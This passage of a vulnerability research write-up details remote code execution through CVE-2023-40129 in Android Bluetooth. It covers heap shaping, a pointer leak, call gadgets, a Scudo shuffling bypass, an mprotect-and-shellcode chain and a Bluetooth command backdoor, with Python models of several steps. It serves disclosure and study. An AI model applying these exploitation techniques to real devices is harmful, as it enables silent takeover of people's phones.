By corrupting the len field of the reader object, we can leak up to 64 KB of data, including the content of the executor object, which holds multiple function pointers that can be used to infer the base address of the libbluetooth library. While analyzing the leaked data, we noticed that the art::Thread object is sometimes present in it. It contains several function pointers into the libart, libm and libc libraries, which are mapped at consecutive addresses. Since this object is rarely present in the leak, we decided not to use it in the exploit.

Code execution

Code execution is obtained by rewriting the SDP Discovery Callback object. We can achieve code execution by modifying either the Run or SdpCb function pointers. The Run() function’s sole purpose is to prepare and dispatch the call to the actual callback SdpCb. However, neither of these pointers is convenient, as we do not have fine-grained control over the arguments.

In order to fully control the arguments, we decided to overwrite the Run function pointer in order to call the following function:

__int64 __fastcall sub_5e023c(__int64 callback)
{
  __int64 v1;
  char *v2;
  __int64 *v3;

  v1 = *(_QWORD *)(callback + 0x28);
  v2 = *(char **)(callback + 0x20);
  v3 = (__int64 *)(*(_QWORD *)(callback + 0x30) + (v1 >> 1));
  if ( (v1 & 1) != 0 )
    v2 = *(char **)&v2[*v3];
  return ((__int64 (__fastcall *)(__int64 *, _QWORD, _QWORD, _QWORD, _QWORD))v2)(
           v3,
           *(_QWORD *)(callback + 0x38),
           *(_QWORD *)(callback + 0x40),
           *(unsigned __int8 *)(callback + 0x48),
           *(unsigned int *)(callback + 0x4C));
}

This function (gadget function) allows us to call an arbitrary function while controlling 5 arguments, the first three of which are QWORDs. Both the target function and its arguments are extracted from the object passed as a parameter to gadget.
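The dispatch performed by the gadget can be restated in Python over a toy memory (a bytearray addressed from 0). Our reading, not stated by the decompiler output, is that it invokes a C++ pointer-to-member function in the AArch64 ABI style: the field at +0x28 is an adjustment whose low bit flags a virtual call, and +0x20 holds either the function address or a vtable offset. The model returns the call target and the five arguments instead of calling anything.

```python
import struct


def u64(mem, addr):
    return struct.unpack_from("<Q", mem, addr)[0]


def gadget_model(mem, cb):
    """Restatement of sub_5e023c(): returns (target, args)."""
    fn = u64(mem, cb + 0x20)
    adj = u64(mem, cb + 0x28)
    this = u64(mem, cb + 0x30) + (adj >> 1)
    if adj & 1:                                  # virtual: fn is a vtable offset
        fn = u64(mem, fn + u64(mem, this))
    args = (
        this,
        u64(mem, cb + 0x38),
        u64(mem, cb + 0x40),
        mem[cb + 0x48],                              # uint8 argument
        struct.unpack_from("<I", mem, cb + 0x4C)[0],  # uint32 argument
    )
    return fn, args


# Non-virtual case: every value below is attacker-written data.
mem = bytearray(0x200)
cb = 0x40
struct.pack_into("<QQQQQ", mem, cb + 0x20, 0x1234, 0, 0x100, 0xAAAA, 0xBBBB)
mem[cb + 0x48] = 7
struct.pack_into("<I", mem, cb + 0x4C, 9)
```

With the adjustment left at 0, the target and all five arguments come straight from the fake object, which is what makes this function a convenient call primitive.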

Now that we control the parameters, let us see how we can call multiple functions.

The list_clear() function takes a list_t structure as input and calls list_free_node_() for each node of the list:

void list_clear(list_t* list) {
    CHECK(list != NULL);
    for (list_node_t* node = list->head; node;)
        node = list_free_node_(list, node);
    list->head = NULL;
    list->tail = NULL;
    list->length = 0;
}

static list_node_t* list_free_node_(list_t* list, list_node_t* node) {
    CHECK(list != NULL);
    CHECK(node != NULL);

    list_node_t* next = node->next;

    if (list->free_cb) list->free_cb(node->data);
    list->allocator->free(node);
    --list->length;

    return next;
}

By injecting a fake list structure with multiple nodes, we can call as many functions as we want. Since we only needed to call two functions, we used a simpler approach: doing the first call through list->free_cb() and the second one through list->allocator->free(). These calls are sufficient to invoke mprotect() - making the page of our shellcode executable - followed by a jump to the shellcode.
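The reason a single fake node yields two calls is visible in a direct Python transcription of list_clear() and list_free_node_(). The classes below are stand-ins for the fake structures, with Python callables in place of the function pointers; the call log shows the order in which the two hijacked pointers fire.

```python
class FakeAllocator:
    def __init__(self, free):
        self.free = free


class Node:
    def __init__(self, data, next_node=None):
        self.data, self.next = data, next_node


class FakeList:
    def __init__(self, head, free_cb, allocator):
        self.head, self.tail = head, None
        self.free_cb, self.allocator = free_cb, allocator
        self.length = 0


def list_clear(lst):
    node = lst.head
    while node:
        nxt = node.next
        if lst.free_cb:
            lst.free_cb(node.data)       # first call: list->free_cb(node->data)
        lst.allocator.free(node)         # second call: list->allocator->free(node)
        lst.length -= 1
        node = nxt
    lst.head = lst.tail = None
    lst.length = 0


calls = []
fake = FakeList(
    Node("mprotect args"),
    free_cb=lambda d: calls.append(("free_cb", d)),
    allocator=FakeAllocator(lambda n: calls.append(("free", n.data))),
)
list_clear(fake)
```

Each node contributes one free_cb call and one allocator->free call, so chaining more nodes would give more calls, as noted above.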

The only missing piece of the puzzle is to put arbitrary data at a known address: the shellcode and all the structures (fake list and node objects) needed to execute it.

The callback object gives us a pointer to a 0x1010-byte heap buffer. By spraying objects (with controlled data) of the same size right after the allocation of the callback object, there is a high probability that they will be placed contiguously in memory. This lets us infer an address where controlled data resides.

The following figure illustrates how to divert the execution control flow in order to execute our shellcode and is summed up hereafter:

Code execution is achieved by rewriting the callback object in order to call the gadget() function.
The gadget function calls the list_clear() function with a fake list object (yellow).
The instruction list->free_cb(node->data) calls the gadget function again in order to prepare the call to mprotect() (pink).
The instruction list->allocator->free(node) calls the shellcode through a call to the gadget function with a fake node object (green) as parameter.

Code execution on Scudo devices

Notes on Scudo allocator

Scudo is a memory allocator designed with a focus on efficiency and security hardening. The following section focuses on the primary allocator that serves small allocations (< 0x10000 bytes).

Scudo organizes memory into regions, each dedicated to allocations of a specific size class (class id). Within these regions, memory is divided into blocks. A block is made of 16 bytes of metadata followed by a chunk, the actual memory unit returned to the program when calling malloc().

When a thread requests memory, the allocator first checks the thread-local cache for available chunks of the appropriate size class. If a chunk is found, it is returned immediately. If the cache is empty, Scudo attempts to pull a TransferBatch - a group of preallocated chunks - from the global freelist in order to populate the cache. If no batch is available, Scudo allocates memory from a region dedicated to the size class, splits it into individual chunks, randomizes their order to mitigate exploitation, and groups them into one or more TransferBatches. One of these batches is returned to the requesting thread, while the others are stored in the global cache for future use.

For further information about the Scudo allocator, we recommend reading a previous blogpost by Kevin Denis.

Scudo has security mitigations that make it difficult to reproduce the same attack scenario:

A memory chunk is prefixed by a checksum, which is verified when the chunk is freed. That is, if we corrupt a block's metadata then free it, the program aborts.
Memory blocks are shuffled. In this context, it is difficult to setup the relative write primitive, which assumes that the callback object is reachable from a fixed offset.

To overcome the first issue, one approach is to shape the heap layout to overlap either freed chunks or persistent allocations.

The shuffling mechanism is applied per batch of memory blocks rather than once for the entire region. The number of randomized blocks per batch depends on the size class. For memory blocks smaller than 0x350 bytes (size class ids 1 to 15), this value is 52 (4 * 13), i.e., the number of TransferBatches multiplied by the number of memory blocks inside each TransferBatch. Therefore, by inserting N = 52 intermediate allocations between the vulnerable object and the target object, it is possible to position the target within overflow range, making it reachable for corruption:
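The effect of the 52 intermediate allocations can be checked with a simplified Python model. It assumes, as a simplification, that blocks are carved in address order in consecutive groups of 52 and that each group is handed out in random order; other threads and partially used groups are ignored. Under that model, the allocation made after 52 intermediates always falls in a later group, hence at a higher address, and within fewer than 3 * 52 blocks.

```python
import random


def batch_shuffled_order(num_blocks, batch=52, rng=random):
    """Block indices in allocation order: each group of `batch`
    consecutive blocks is shuffled independently."""
    order = []
    for start in range(0, num_blocks, batch):
        group = list(range(start, min(start + batch, num_blocks)))
        rng.shuffle(group)
        order.extend(group)
    return order


N = 52                                   # intermediate allocations
order = batch_shuffled_order(52 * 10, rng=random.Random(1))
# Distance (in blocks) from each candidate vulnerable chunk to its target.
distances = [order[i + N + 1] - order[i] for i in range(52 * 8)]
```

For example, with hypothetical 0x70-byte blocks, the worst case of 155 blocks is 155 * 0x70 = 17,360 bytes, comfortably within the 64 KB overflow.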

Exploitation scenario

Since we cannot set up a relative write primitive, we trigger the overflow twice!

The first overflow targets a reader object in order to get the base address of the libbluetooth library.
The second overflow targets an executor object (callback) in order to trigger code execution.

And hope that the process survives 64 KB of corrupted heap data.

Heap shaping

We adopt a slightly different heap shaping strategy in order to control the source of the overflow. As usual, we rely on congestion to spray around a hundred CONFIG REJ messages, and we use ERTM transmission to create "holes" in the heap.

The diagram below illustrates the source data before and after the overflow. We reserve space for various GATT attributes using ERTM messages. It is important to note that ERTM messages are freed in the order they were allocated. The first ERTM message allocated is the one that will be reclaimed by the vulnerable GATT allocation (shown in green). We separate the allocation of this specific ERTM message so that it is followed by several CONFIG REJ responses containing controlled data.

Memory leak

Unfortunately, attempts to leak the contents of the callback used in the previous exploit were unsuccessful. However, a second callback object was consistently observed in the leaked data. This object is allocated by the ActivityAttribution::Capture() function, which is responsible for logging HCI packets. This object holds several function pointers, allowing us to deduce the base address of the process as well as the location of the allocation that will later host our payload.
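Turning a leaked function pointer into a library base address is simple arithmetic: subtract the pointer's offset within libbluetooth.so for the exact build running on the target. The sketch below assumes that offset is already known (for example from the device's libbluetooth.so symbols) and a 4 KB page size; the helper names and all values are made up.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KB pages (some arm64 devices use 16 KB)


def library_base(leaked_ptr, symbol_offset, page_size=PAGE_SIZE):
    """Base address of the library that contains the leaked function pointer."""
    base = leaked_ptr - symbol_offset
    # A library is mapped at a page-aligned address; a misaligned result
    # means the offset belongs to a different build of the library.
    if base % page_size:
        raise ValueError("misaligned base: offset does not match this build")
    return base


def rebase(base, offset):
    """Absolute address of another symbol or gadget at `offset` in the library."""
    return base + offset


# Usage with made-up values:
# library_base(0x7a124e2b30, 0x1a2b30) == 0x7a12340000
# rebase(0x7a12340000, 0x123450) == 0x7a12463450
```

The page-alignment check is a cheap sanity test: a wrong offset (for instance one taken from a different firmware version) almost always yields a misaligned base.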

Code Execution

Code execution is achieved by triggering the vulnerability a second time to corrupt the SDP Discovery Callback used in the Jemalloc exploit. However, due to memory chunk shuffling, it is hard to reliably rewrite all the fields of the callback object (we can only ensure that the overflowing data will be aligned on a 16-byte boundary).

One solution is to overwrite the Run function pointer with the address of the following gadget:

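LDR  X0, [X0]        // X0 = first qword of the object passed in X0
MOV  W8, W1          // swap W1 and W2, using W8 as scratch
MOV  W1, W2
MOV  W2, W8
LDR  X3, [X0,#8]     // X3 = qword at offset 8 of the new X0
BR   X3              // jump there, with X0 pointing to that memory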

Exploitation via this pivot gadget only requires corrupting two specific fields of the callback object to divert the execution flow, as illustrated below:
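To make the pivot concrete, the toy emulation below models the gadget on a dictionary-based memory and shows how a 16-byte-periodic overflow can set both fields without knowing the exact alignment. It relies on hypothetical assumptions that the article does not state: the call site passes the callback object in X0, the field dereferenced by LDR X0, [X0] is at offset 0 of that object and the Run pointer at offset 8. All addresses are made up.

```python
import struct

# Toy model: memory is a dict mapping 8-byte-aligned addresses to 64-bit values.
# Hypothetical assumptions: the call site passes the callback object in X0, the
# field read by "LDR X0, [X0]" is at offset 0 and the Run pointer at offset 8.


def spray_pattern(fake_ptr, gadget, length):
    """Overflow data built from repeated 16-byte (fake_ptr, gadget) units."""
    unit = struct.pack("<QQ", fake_ptr, gadget)
    return (unit * (length // 16 + 1))[:length]


def write(mem, addr, data):
    """Store data (length a multiple of 8) at an 8-byte-aligned address."""
    for i in range(0, len(data), 8):
        mem[addr + i] = struct.unpack_from("<Q", data, i)[0]


def run_pivot_gadget(mem, x0, x1, x2):
    """Emulate LDR X0,[X0]; MOV W8,W1; MOV W1,W2; MOV W2,W8; LDR X3,[X0,#8]; BR X3."""
    x0 = mem[x0]               # LDR X0, [X0]
    w8 = x1 & 0xFFFFFFFF       # MOV W8, W1 (32-bit writes zero the upper half)
    x1 = x2 & 0xFFFFFFFF       # MOV W1, W2
    x2 = w8                    # MOV W2, W8
    x3 = mem[x0 + 8]           # LDR X3, [X0, #8]
    return {"pc": x3, "x0": x0, "x1": x1, "x2": x2}   # BR X3


# Usage with made-up addresses.
CALLBACK = 0x7000_0000_1230    # 16-byte-aligned callback object
PAYLOAD = 0x7000_0040_0000     # controlled buffer whose address was leaked
GADGET = 0x7100_0012_3450      # pivot gadget inside libbluetooth
NEXT_PC = 0x7100_0045_6780     # next stage, stored at PAYLOAD + 8

mem = {}
# The overflow starts at an unknown 16-byte-aligned distance before the object.
write(mem, CALLBACK - 0x40, spray_pattern(PAYLOAD, GADGET, 0x80))
write(mem, PAYLOAD, struct.pack("<QQ", 0, NEXT_PC))
run_ptr = mem[CALLBACK + 8]                    # the corrupted Run pointer
state = run_pivot_gadget(mem, CALLBACK, 1, 2)  # Run(X0 = callback object)
```

In this model, any 16-byte-aligned starting point writes the pointer at offset 0 and the gadget address at offset 8. With only 8-byte alignment, the pattern could land shifted by 8 and swap the two values, which is why the 16-byte guarantee matters here.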

Post Exploitation

The shellcode installs a command handler over Bluetooth, which provides useful features to interact with the target, such as running shell commands or uploading files to the device. More precisely, the shellcode starts by patching the function l2c_rcv_acl_data() to redirect it to our command handler. This function is called whenever an ACL data packet is received from the controller.
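The article does not detail how l2c_rcv_acl_data() is patched. One common way to hook an AArch64 function, shown here as an assumption, is to overwrite its first instruction with an unconditional B to the handler. The sketch computes that encoding (opcode 0b000101 followed by a signed 26-bit offset counted in instructions); the helper names are hypothetical.

```python
import struct

# Sketch of an AArch64 "B <target>" encoding, one possible way to redirect a
# function (assumption: the article does not say how the hook is written).
B_OPCODE = 0x14000000          # 0b000101 in bits 31..26
IMM26_MASK = 0x03FFFFFF


def encode_b(pc, target):
    """Encode an unconditional branch from `pc` to `target`."""
    delta = target - pc
    if delta % 4:
        raise ValueError("branch offset must be a multiple of 4")
    imm26 = delta >> 2                     # offset counted in instructions
    if not -(1 << 25) <= imm26 < (1 << 25):
        raise ValueError("target out of range for B (+/-128 MiB)")
    return B_OPCODE | (imm26 & IMM26_MASK)


def hook_bytes(func_addr, handler_addr):
    """Little-endian bytes to write over the first instruction of the function."""
    return struct.pack("<I", encode_b(func_addr, handler_addr))
```

In a real patch, the code page must first be made writable (for example with mprotect) and the instruction cache flushed afterwards. If the handler lives more than 128 MiB away, for instance in a heap buffer, an indirect branch through a register is needed instead of B.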

The shellcode also registers a signal handler to catch SIGSEGV signals, preventing the com.android.bluetooth process from restarting if a thread crashes because of the heap instability caused by the 64 KB overflow.

Conclusion

CVE-2023-40129 is a critical vulnerability in the Bluetooth stack, which requires neither user interaction nor prior authentication. We successfully exploited it to achieve remote code execution on Android devices using Jemalloc (Xiaomi 12T) and Scudo (Samsung A54).

The exploits are not perfectly reliable and often crash the Bluetooth process. However, the Bluetooth daemon silently restarts, so we can retry the exploit repeatedly. We conducted some basic testing and found that, on average, the Estimated Time of Shell (ETS) is around 2 minutes on Jemalloc devices, and up to 5 minutes on Scudo devices.

The Gabeldorsche stack (GD)

The Gabeldorsche stack was introduced in Android 12 and became the default Bluetooth stack in Android 13. It represents a major architectural shift, with a progressive rewrite of the Bluetooth stack in Rust. However, as of late 2023, only the low-level layers had been rewritten, leaving higher layers unchanged. As a result, the vulnerability remained exploitable even when GD was enabled.

References

BlueBorne. Ben Seri, Gregory Vishnepolsky (Armis Labs)

Behind the Shield: Unmasking Scudo's Defenses. Kevin Denis (Synacktiv)

0-click RCE on the IVI component: Pwn2Own Automotive Edition. Mikhail Evdokimov (PCAutomotive) - Hexacon'24

Fighting Cavities: Securing Android Bluetooth by Red Teaming. Jeong Wook Oh, Rishika Hooda and Xuan Xing (Google) - OffensiveCon'25
